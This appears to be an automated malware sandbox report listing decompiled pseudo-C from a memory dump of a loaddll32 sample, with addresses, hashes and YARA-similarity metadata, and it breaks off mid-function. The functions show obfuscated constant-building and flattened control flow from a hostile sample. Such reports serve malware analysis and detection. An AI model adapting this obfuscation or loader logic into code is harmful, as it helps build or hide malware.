                                                                                                          0x02ae7483
                                                                                                          0x02ae748f
                                                                                                          0x02ae7495
                                                                                                          0x02ae749d
                                                                                                          0x02ae74a5
                                                                                                          0x02ae74b2
                                                                                                          0x02ae74b3
                                                                                                          0x02ae74b7
                                                                                                          0x02ae74bf
                                                                                                          0x02ae74c7
                                                                                                          0x02ae74cf
                                                                                                          0x02ae74e2
                                                                                                          0x02ae74e6
                                                                                                          0x02ae74eb
                                                                                                          0x02ae74f3
                                                                                                          0x02ae74fb
                                                                                                          0x02ae7503
                                                                                                          0x02ae750b
                                                                                                          0x02ae7513
                                                                                                          0x02ae751b
                                                                                                          0x02ae7520
                                                                                                          0x02ae7524
                                                                                                          0x02ae752c
                                                                                                          0x02ae7534
                                                                                                          0x02ae7539
                                                                                                          0x02ae7541
                                                                                                          0x02ae7549
                                                                                                          0x02ae754e
                                                                                                          0x02ae7556
                                                                                                          0x02ae7556
                                                                                                          0x02ae7564
                                                                                                          0x02ae75ad
                                                                                                          0x02ae75b6
                                                                                                          0x02ae75be
                                                                                                          0x00000000
                                                                                                          0x02ae7566
                                                                                                          0x02ae7568
                                                                                                          0x02ae75a2
                                                                                                          0x02ae75a7
                                                                                                          0x00000000
                                                                                                          0x02ae756a
                                                                                                          0x02ae7570
                                                                                                          0x02ae759c
                                                                                                          0x02ae75f8
                                                                                                          0x02ae759e
                                                                                                          0x02ae759e
                                                                                                          0x00000000
                                                                                                          0x02ae759e
                                                                                                          0x02ae7572
                                                                                                          0x02ae7574
                                                                                                          0x00000000
                                                                                                          0x02ae7576
                                                                                                          0x02ae757e
                                                                                                          0x02ae7588
                                                                                                          0x02ae758e
                                                                                                          0x02ae7574
                                                                                                          0x02ae7570
                                                                                                          0x02ae7568
                                                                                                          0x02ae75fa
                                                                                                          0x02ae7602
                                                                                                          0x02ae7602
                                                                                                          0x02ae75d2
                                                                                                          0x02ae75d3
                                                                                                          0x02ae75d6
                                                                                                          0x02ae75db
                                                                                                          0x02ae75de
                                                                                                          0x02ae75e3
                                                                                                          0x02ae75e8
                                                                                                          0x02ae75e8
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: F$K3xq$k_
                                                                                                          • API String ID: 0-3174058581
                                                                                                          • Opcode ID: 095c7c7113c46c1af3e2d1f18ce87ef4618b99b9575a5bb4d16d3f3f7cfe36cd
                                                                                                          • Instruction ID: d7d1e7121632c674223bbc329f7b60847e5ed5a4adf7168434df8e7112e41e33
                                                                                                          • Opcode Fuzzy Hash: 095c7c7113c46c1af3e2d1f18ce87ef4618b99b9575a5bb4d16d3f3f7cfe36cd
                                                                                                          • Instruction Fuzzy Hash: C341BD716083029FCB58EF24D88592FFBE1FBC8758F00091EF58696261DB748A09CB97
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFA2A5, Relevance: 3.9, Strings: 3, Instructions: 105COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 63%
                                                                                                          			E02AFA2A5(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t127;
				intOrPtr _t136;

				_v56 = _v56 & 0x00000000;
				_v68 = 0x56d43f;
				_v64 = 0xa378a6;
				_v60 = 0xa37ee;
				_v44 = 0x7acd08;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x000369a9;
				_v12 = 0x8bcc43;
				_v12 = _v12 << 6;
				_v12 = _v12 | 0x230a0204;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0xfb180412;
				_v8 = 0x75376c;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x2bde3cb3;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x15e166f0;
				_v36 = 0x2455a;
				_v36 = _v36 >> 2;
				_v36 = _v36 + 0xffff434e;
				_v36 = _v36 ^ 0xfff24d76;
				_v20 = 0x28ad7b;
				_v20 = _v20 << 6;
				_v20 = _v20 << 0x10;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x00010bf1;
				_v16 = 0xc11cd7;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x000c5122;
				_v48 = 0x6ce03d;
				_v48 = _v48 ^ 0x08e870e9;
				_v48 = _v48 ^ 0x08851ea6;
				_v40 = 0xece1ae;
				_v40 = _v40 | 0xa708c82b;
				_v40 = _v40 + 0xffff66a5;
				_v40 = _v40 ^ 0xa7eb2511;
				_v52 = 0x51901b;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x0285bcb2;
				_v32 = 0xe2234;
				_v32 = _v32 ^ 0x801b0981;
				_v32 = _v32 + 0xffff47d0;
				_v32 = _v32 + 0x1bdf;
				_v32 = _v32 ^ 0x8011a9a9;
				_v28 = 0xf9a2d;
				_v28 = _v28 + 0xffff0cd9;
				_t127 = 0x38;
				_t136 = _a4;
				_v28 = _v28 * 0x39;
				_v28 = _v28 + 0xf1da;
				_v28 = _v28 ^ 0x0344abfa;
				_v24 = 0x8a904b;
				_v24 = _v24 + 0x44ce;
				_v24 = _v24 / _t127;
				_v24 = _v24 << 0xc;
				_v24 = _v24 ^ 0x27a49ff9;
				_t121 =  *((intOrPtr*)(_t136 + 0x2c))( *((intOrPtr*)(_t136 + 0x38)), 1, 0);
				_t143 = _t121;
				if(_t121 != 0) {
					_push(_v36);
					_push(_v8);
					_push(0x2ae18ec);
					_t123 = E02AF4244(_v44, _v12, _t143);
					_push(_v40);
					_t138 = _t123;
					_push(_v48);
					_push(_t123);
					_push( *((intOrPtr*)(_t136 + 0x38)));
					_t124 = E02B03560(_v20, _v16);
					if(_t124 != 0) {
						 *_t124();
					}
					E02AFFECB(_t138, _v52, _v32, _v28, _v24);
				}
				return 0;
			}
























                                                                                                          0x02afa2ac
                                                                                                          0x02afa2b2
                                                                                                          0x02afa2b9
                                                                                                          0x02afa2c0
                                                                                                          0x02afa2c7
                                                                                                          0x02afa2ce
                                                                                                          0x02afa2d2
                                                                                                          0x02afa2d9
                                                                                                          0x02afa2e0
                                                                                                          0x02afa2e4
                                                                                                          0x02afa2eb
                                                                                                          0x02afa2ef
                                                                                                          0x02afa2f6
                                                                                                          0x02afa2fd
                                                                                                          0x02afa301
                                                                                                          0x02afa308
                                                                                                          0x02afa30b
                                                                                                          0x02afa312
                                                                                                          0x02afa319
                                                                                                          0x02afa31d
                                                                                                          0x02afa324
                                                                                                          0x02afa32b
                                                                                                          0x02afa332
                                                                                                          0x02afa336
                                                                                                          0x02afa33a
                                                                                                          0x02afa33e
                                                                                                          0x02afa345
                                                                                                          0x02afa34c
                                                                                                          0x02afa350
                                                                                                          0x02afa354
                                                                                                          0x02afa358
                                                                                                          0x02afa35f
                                                                                                          0x02afa366
                                                                                                          0x02afa36d
                                                                                                          0x02afa374
                                                                                                          0x02afa37b
                                                                                                          0x02afa382
                                                                                                          0x02afa389
                                                                                                          0x02afa390
                                                                                                          0x02afa397
                                                                                                          0x02afa39b
                                                                                                          0x02afa3a2
                                                                                                          0x02afa3a9
                                                                                                          0x02afa3b0
                                                                                                          0x02afa3b7
                                                                                                          0x02afa3be
                                                                                                          0x02afa3c5
                                                                                                          0x02afa3cc
                                                                                                          0x02afa3d9
                                                                                                          0x02afa3da
                                                                                                          0x02afa3dd
                                                                                                          0x02afa3e0
                                                                                                          0x02afa3e7
                                                                                                          0x02afa3ee
                                                                                                          0x02afa3f5
                                                                                                          0x02afa403
                                                                                                          0x02afa406
                                                                                                          0x02afa40a
                                                                                                          0x02afa416
                                                                                                          0x02afa419
                                                                                                          0x02afa41b
                                                                                                          0x02afa41e
                                                                                                          0x02afa421
                                                                                                          0x02afa42a
                                                                                                          0x02afa42f
                                                                                                          0x02afa434
                                                                                                          0x02afa437
                                                                                                          0x02afa439
                                                                                                          0x02afa442
                                                                                                          0x02afa443
                                                                                                          0x02afa446
                                                                                                          0x02afa450
                                                                                                          0x02afa452
                                                                                                          0x02afa452
                                                                                                          0x02afa462
                                                                                                          0x02afa46a
                                                                                                          0x02afa471

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: =l$l7u$7
                                                                                                          • API String ID: 0-2380881030
                                                                                                          • Opcode ID: 844d48c26b11e117ed8bb9fd73e8b3045dd1b0d63aaf6405b185d028a253e93f
                                                                                                          • Instruction ID: 374e62789bf936ae58992ed16b7828ec1e4b27defbe0b4cc629d83046a918174
                                                                                                          • Opcode Fuzzy Hash: 844d48c26b11e117ed8bb9fd73e8b3045dd1b0d63aaf6405b185d028a253e93f
                                                                                                          • Instruction Fuzzy Hash: FB512171D0021AEBDF45CFE5D98A5EEBBB1FF44318F208158D912B2220D7B44A59CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEBAA9, Relevance: 3.8, Strings: 3, Instructions: 89COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 92%
                                                                                                          			E02AEBAA9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t119;
				signed int _t120;

				_t119 = _a12;
				_push(_t119);
				_push(_a8);
				_push(_a4);
				E02AFFE29(_t91);
				_v36 = _v36 & 0x00000000;
				_v40 = 0x12a44;
				_v16 = 0x6d7ae4;
				_t109 = 9;
				_v16 = _v16 * 0x2c;
				_v16 = _v16 ^ 0x12d84a78;
				_v8 = 0x632f63;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x2f02a769;
				_v8 = _v8 + 0xffffcf5a;
				_v8 = _v8 ^ 0xb8bafcbb;
				_a12 = 0xb71f5c;
				_a12 = _a12 + 0x2974;
				_a12 = _a12 / _t109;
				_t110 = 0x4b;
				_a12 = _a12 * 0x6a;
				_a12 = _a12 ^ 0x0865fbc8;
				_v28 = 0x14d1df;
				_v28 = _v28 + 0x8244;
				_v28 = _v28 ^ 0x001f502f;
				_v24 = 0x8a40f8;
				_v24 = _v24 | 0x61e91a85;
				_v24 = _v24 ^ 0x61e69297;
				_v32 = 0x91ce11;
				_v32 = _v32 + 0xffffd148;
				_v32 = _v32 ^ 0x009b82ce;
				_v20 = 0xf1824f;
				_v20 = _v20 / _t110;
				_v20 = _v20 ^ 0x68027ae2;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x3404b933;
				E02AEDC1B(_t110);
				_v16 = 0x8712a3;
				_v16 = _v16 + 0xf3d2;
				_v16 = _v16 + 0xffff1cdd;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004395;
				_v12 = 0x6a396b;
				_v12 = _v12 | 0x9b16e6b5;
				_v12 = _v12 << 0xd;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x006fffe0;
				_t120 = E02AFCCA0(_v16, _v12);
				E02AEE404(_v32, 1, _v20, _t120, _t119);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

















                                                                                                          0x02aebab1
                                                                                                          0x02aebab4
                                                                                                          0x02aebab5
                                                                                                          0x02aebab8
                                                                                                          0x02aebabd
                                                                                                          0x02aebac2
                                                                                                          0x02aebac8
                                                                                                          0x02aebacf
                                                                                                          0x02aebadc
                                                                                                          0x02aebadf
                                                                                                          0x02aebae2
                                                                                                          0x02aebae9
                                                                                                          0x02aebaf0
                                                                                                          0x02aebaf4
                                                                                                          0x02aebafb
                                                                                                          0x02aebb02
                                                                                                          0x02aebb09
                                                                                                          0x02aebb10
                                                                                                          0x02aebb1e
                                                                                                          0x02aebb25
                                                                                                          0x02aebb26
                                                                                                          0x02aebb29
                                                                                                          0x02aebb30
                                                                                                          0x02aebb37
                                                                                                          0x02aebb3e
                                                                                                          0x02aebb45
                                                                                                          0x02aebb4c
                                                                                                          0x02aebb53
                                                                                                          0x02aebb5a
                                                                                                          0x02aebb61
                                                                                                          0x02aebb68
                                                                                                          0x02aebb6f
                                                                                                          0x02aebb7b
                                                                                                          0x02aebb7e
                                                                                                          0x02aebb85
                                                                                                          0x02aebb88
                                                                                                          0x02aebb92
                                                                                                          0x02aebb97
                                                                                                          0x02aebba1
                                                                                                          0x02aebba8
                                                                                                          0x02aebbaf
                                                                                                          0x02aebbb3
                                                                                                          0x02aebbba
                                                                                                          0x02aebbc1
                                                                                                          0x02aebbc8
                                                                                                          0x02aebbcc
                                                                                                          0x02aebbd0
                                                                                                          0x02aebbee
                                                                                                          0x02aebbfb
                                                                                                          0x02aebc05
                                                                                                          0x02aebc0e

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: c/c$k9j$zm
                                                                                                          • API String ID: 0-1793526708
                                                                                                          • Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
                                                                                                          • Instruction ID: 05bce51c517edb8834d9254df07c96aae716c2908f5f393bb068a3415f907193
                                                                                                          • Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
                                                                                                          • Instruction Fuzzy Hash: 90412372C0030AABCF04DFA5C94A5EEBBB2FF44314F108558E521A6260E7B49B15CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFAD08, Relevance: 2.7, Strings: 2, Instructions: 243COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AFAD08() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t267;
				void* _t273;
				void* _t277;
				intOrPtr _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int* _t322;

				_t322 =  &_v1144;
				_v1052 = 0x3e8be7;
				_t310 = 0;
				_t277 = 0xe4a3d19;
				_v1048 = 0;
				_v1044 = 0;
				_v1100 = 0x8001b8;
				_t311 = 0x1c;
				_v1100 = _v1100 / _t311;
				_v1100 = _v1100 + 0x9b02;
				_v1100 = _v1100 ^ 0x0003825e;
				_v1104 = 0x6ba50e;
				_v1104 = _v1104 + 0x86a8;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0xb0a58b81;
				_v1064 = 0xa5f60f;
				_v1064 = _v1064 ^ 0xf15b406a;
				_v1064 = _v1064 ^ 0xf1fbbabe;
				_v1116 = 0xfce2df;
				_v1116 = _v1116 ^ 0xb7cf3da1;
				_v1116 = _v1116 + 0x963f;
				_v1116 = _v1116 ^ 0x6f9af2b2;
				_v1116 = _v1116 ^ 0xd8ae206e;
				_v1132 = 0x6fbbde;
				_v1132 = _v1132 | 0xe49a2ecd;
				_v1132 = _v1132 + 0xd857;
				_v1132 = _v1132 + 0xffffaa9b;
				_v1132 = _v1132 ^ 0xe507ae81;
				_v1096 = 0xa4704d;
				_v1096 = _v1096 + 0x7787;
				_t312 = 0x67;
				_v1096 = _v1096 / _t312;
				_v1096 = _v1096 ^ 0x00025cd8;
				_v1084 = 0x38937;
				_t313 = 0x79;
				_v1084 = _v1084 * 0x4f;
				_v1084 = _v1084 ^ 0x5b1a1bbe;
				_v1084 = _v1084 ^ 0x5a043b4e;
				_v1136 = 0x1276ee;
				_v1136 = _v1136 + 0xffffa0e4;
				_v1136 = _v1136 + 0xffff74bb;
				_v1136 = _v1136 << 2;
				_v1136 = _v1136 ^ 0x0044c443;
				_v1068 = 0xe79065;
				_v1068 = _v1068 << 0xc;
				_v1068 = _v1068 + 0xcbe6;
				_v1068 = _v1068 ^ 0x7908daa4;
				_v1088 = 0x9a4bed;
				_v1088 = _v1088 + 0xfffff274;
				_v1088 = _v1088 + 0xb36d;
				_v1088 = _v1088 ^ 0x00951f6d;
				_v1144 = 0x62e226;
				_v1144 = _v1144 ^ 0x3dd3a3b2;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff6a42;
				_v1144 = _v1144 ^ 0x0008f37a;
				_v1108 = 0x394fd6;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 / _t313;
				_v1108 = _v1108 ^ 0x00080299;
				_v1120 = 0x93d07f;
				_v1120 = _v1120 << 0xa;
				_t314 = 5;
				_v1120 = _v1120 / _t314;
				_v1120 = _v1120 ^ 0x44bcf5d7;
				_v1120 = _v1120 ^ 0x4b68940f;
				_v1072 = 0xc1f636;
				_v1072 = _v1072 | 0x86bbf578;
				_t315 = 0x47;
				_v1072 = _v1072 * 0x24;
				_v1072 = _v1072 ^ 0xfb68157e;
				_v1080 = 0x3ac036;
				_v1080 = _v1080 + 0xffffbaa8;
				_v1080 = _v1080 ^ 0x136d94c6;
				_v1080 = _v1080 ^ 0x1353f0eb;
				_v1128 = 0xb3095e;
				_v1128 = _v1128 / _t315;
				_v1128 = _v1128 | 0xf7128eca;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x0004e558;
				_v1076 = 0x73500f;
				_v1076 = _v1076 | 0x9d7bc413;
				_v1076 = _v1076 + 0xffff6f55;
				_v1076 = _v1076 ^ 0x9d72e045;
				_v1124 = 0xc98916;
				_v1124 = _v1124 + 0x2b72;
				_v1124 = _v1124 | 0x4777986b;
				_t316 = 0x69;
				_v1124 = _v1124 / _t316;
				_v1124 = _v1124 ^ 0x00ab5a68;
				_v1140 = 0xc8b3ea;
				_t317 = 0x7e;
				_v1140 = _v1140 / _t317;
				_v1140 = _v1140 | 0x89e2a6fa;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x08902903;
				_v1092 = 0x846906;
				_v1092 = _v1092 | 0x1b02230c;
				_v1092 = _v1092 + 0xffff209e;
				_v1092 = _v1092 ^ 0x1b8bec31;
				_v1056 = 0xaf8c32;
				_t318 = 0x2e;
				_v1056 = _v1056 / _t318;
				_v1056 = _v1056 ^ 0x00017103;
				_v1060 = 0x7e9355;
				_v1060 = _v1060 >> 0x10;
				_v1060 = _v1060 ^ 0x0008a840;
				_v1112 = 0x76e6c0;
				_v1112 = _v1112 ^ 0x1858c3ee;
				_t319 = 0x68;
				_v1112 = _v1112 / _t319;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x000255a3;
				do {
					while(_t277 != 0xc59040) {
						if(_t277 == 0x420aa66) {
							_push(_v1084);
							_push(_v1096);
							_push(_v1132);
							_t263 = E02AFE1F8(0x2ae1000, _v1116, __eflags);
							_t264 =  *0x2b06214; // 0x0
							_t267 =  *0x2b06214; // 0x0
							E02B02D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x2ae1000,  &_v1040, _t264 + 0x34, _t263);
							E02AFFECB(_t263, _v1120, _v1072, _v1080, _v1128);
							_t322 =  &(_t322[0xe]);
							_t277 = 0x835dcf5;
							continue;
						} else {
							if(_t277 == 0x835dcf5) {
								_t273 = E02AF654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
								_t322 =  &(_t322[3]);
								__eflags = _t273;
								_t310 =  !=  ? 1 : _t310;
								_t277 = 0xb7cde49;
								continue;
							} else {
								if(_t277 == 0xb7cde49) {
									E02AF7A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
								} else {
									if(_t277 != 0xe4a3d19) {
										goto L10;
									} else {
										_t277 = 0xc59040;
										continue;
									}
								}
							}
						}
						L13:
						return _t310;
					}
					E02B00DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
					_t322 =  &(_t322[3]);
					_t277 = 0x420aa66;
					L10:
					__eflags = _t277 - 0xd159d29;
				} while (__eflags != 0);
				goto L13;
			}















































                                                                                                          0x02afad08
                                                                                                          0x02afad0e
                                                                                                          0x02afad1c
                                                                                                          0x02afad1e
                                                                                                          0x02afad23
                                                                                                          0x02afad27
                                                                                                          0x02afad2b
                                                                                                          0x02afad39
                                                                                                          0x02afad3e
                                                                                                          0x02afad44
                                                                                                          0x02afad4c
                                                                                                          0x02afad54
                                                                                                          0x02afad5c
                                                                                                          0x02afad64
                                                                                                          0x02afad69
                                                                                                          0x02afad71
                                                                                                          0x02afad79
                                                                                                          0x02afad81
                                                                                                          0x02afad89
                                                                                                          0x02afad91
                                                                                                          0x02afad99
                                                                                                          0x02afada1
                                                                                                          0x02afada9
                                                                                                          0x02afadb1
                                                                                                          0x02afadb9
                                                                                                          0x02afadc1
                                                                                                          0x02afadc9
                                                                                                          0x02afadd1
                                                                                                          0x02afadd9
                                                                                                          0x02afade1
                                                                                                          0x02afaded
                                                                                                          0x02afadf2
                                                                                                          0x02afadf8
                                                                                                          0x02afae00
                                                                                                          0x02afae0d
                                                                                                          0x02afae0e
                                                                                                          0x02afae12
                                                                                                          0x02afae1a
                                                                                                          0x02afae22
                                                                                                          0x02afae2a
                                                                                                          0x02afae32
                                                                                                          0x02afae3a
                                                                                                          0x02afae3f
                                                                                                          0x02afae47
                                                                                                          0x02afae4f
                                                                                                          0x02afae54
                                                                                                          0x02afae5c
                                                                                                          0x02afae64
                                                                                                          0x02afae6c
                                                                                                          0x02afae74
                                                                                                          0x02afae7c
                                                                                                          0x02afae84
                                                                                                          0x02afae8c
                                                                                                          0x02afae94
                                                                                                          0x02afae99
                                                                                                          0x02afaea1
                                                                                                          0x02afaea9
                                                                                                          0x02afaeb6
                                                                                                          0x02afaec0
                                                                                                          0x02afaec4
                                                                                                          0x02afaecc
                                                                                                          0x02afaed4
                                                                                                          0x02afaee1
                                                                                                          0x02afaee6
                                                                                                          0x02afaeec
                                                                                                          0x02afaef9
                                                                                                          0x02afaf06
                                                                                                          0x02afaf0e
                                                                                                          0x02afaf1b
                                                                                                          0x02afaf1e
                                                                                                          0x02afaf22
                                                                                                          0x02afaf2a
                                                                                                          0x02afaf32
                                                                                                          0x02afaf3a
                                                                                                          0x02afaf42
                                                                                                          0x02afaf4a
                                                                                                          0x02afaf5a
                                                                                                          0x02afaf5e
                                                                                                          0x02afaf66
                                                                                                          0x02afaf6b
                                                                                                          0x02afaf73
                                                                                                          0x02afaf7b
                                                                                                          0x02afaf83
                                                                                                          0x02afaf8b
                                                                                                          0x02afaf93
                                                                                                          0x02afaf9b
                                                                                                          0x02afafa3
                                                                                                          0x02afafaf
                                                                                                          0x02afafb4
                                                                                                          0x02afafba
                                                                                                          0x02afafc2
                                                                                                          0x02afafce
                                                                                                          0x02afafd3
                                                                                                          0x02afafd9
                                                                                                          0x02afafe1
                                                                                                          0x02afafe6
                                                                                                          0x02afafee
                                                                                                          0x02afaff6
                                                                                                          0x02afaffe
                                                                                                          0x02afb006
                                                                                                          0x02afb00e
                                                                                                          0x02afb01a
                                                                                                          0x02afb01f
                                                                                                          0x02afb025
                                                                                                          0x02afb02d
                                                                                                          0x02afb035
                                                                                                          0x02afb03a
                                                                                                          0x02afb042
                                                                                                          0x02afb04a
                                                                                                          0x02afb056
                                                                                                          0x02afb059
                                                                                                          0x02afb05d
                                                                                                          0x02afb062
                                                                                                          0x02afb06a
                                                                                                          0x02afb06a
                                                                                                          0x02afb074
                                                                                                          0x02afb0ca
                                                                                                          0x02afb0d3
                                                                                                          0x02afb0d7
                                                                                                          0x02afb0df
                                                                                                          0x02afb0e9
                                                                                                          0x02afb108
                                                                                                          0x02afb11b
                                                                                                          0x02afb135
                                                                                                          0x02afb13a
                                                                                                          0x02afb13d
                                                                                                          0x00000000
                                                                                                          0x02afb076
                                                                                                          0x02afb07c
                                                                                                          0x02afb0b3
                                                                                                          0x02afb0ba
                                                                                                          0x02afb0be
                                                                                                          0x02afb0c0
                                                                                                          0x02afb0c3
                                                                                                          0x00000000
                                                                                                          0x02afb07e
                                                                                                          0x02afb084
                                                                                                          0x02afb187
                                                                                                          0x02afb08a
                                                                                                          0x02afb090
                                                                                                          0x00000000
                                                                                                          0x02afb096
                                                                                                          0x02afb096
                                                                                                          0x00000000
                                                                                                          0x02afb096
                                                                                                          0x02afb090
                                                                                                          0x02afb084
                                                                                                          0x02afb07c
                                                                                                          0x02afb18f
                                                                                                          0x02afb19b
                                                                                                          0x02afb19b
                                                                                                          0x02afb15b
                                                                                                          0x02afb160
                                                                                                          0x02afb163
                                                                                                          0x02afb165
                                                                                                          0x02afb165
                                                                                                          0x02afb165
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: &b$r+
                                                                                                          • API String ID: 0-3016113347
                                                                                                          • Opcode ID: 73e527312e044fcbb6a3d5b348edb75abe0280929b5bf50f1e6686bbb0b59b94
                                                                                                          • Instruction ID: c7adc726271f7331c902e69077c52a034a2595c8c34b8d89eeaf6cdc59681e08
                                                                                                          • Opcode Fuzzy Hash: 73e527312e044fcbb6a3d5b348edb75abe0280929b5bf50f1e6686bbb0b59b94
                                                                                                          • Instruction Fuzzy Hash: D0C122B15093409FC3A8CF66C98950BFBF1FBD4758F108A2DF29686260D7B98949CF46
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF4F74, Relevance: 2.7, Strings: 2, Instructions: 199COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 96%
                                                                                                          			E02AF4F74() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t210;
				void* _t211;
				intOrPtr _t213;
				void* _t217;
				intOrPtr _t224;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int* _t254;

				_t254 =  &_v604;
				_v528 = 0xeac4cc;
				_v528 = _v528 | 0xab847aec;
				_t217 = 0x3550051;
				_v528 = _v528 ^ 0xabe53c27;
				_v564 = 0x85ed10;
				_v564 = _v564 << 0xe;
				_v564 = _v564 | 0x02c2a82c;
				_v564 = _v564 ^ 0x7bc732f4;
				_v548 = 0x432dfc;
				_v548 = _v548 ^ 0x2e419a47;
				_v548 = _v548 ^ 0x2e0248f0;
				_v556 = 0x7b6619;
				_t246 = 0x1c;
				_v556 = _v556 / _t246;
				_v556 = _v556 << 0x10;
				_v556 = _v556 ^ 0x68371ab0;
				_v568 = 0x76f94b;
				_t247 = 7;
				_v568 = _v568 / _t247;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x1fed9d10;
				_v572 = 0x34fb4;
				_t248 = 0xf;
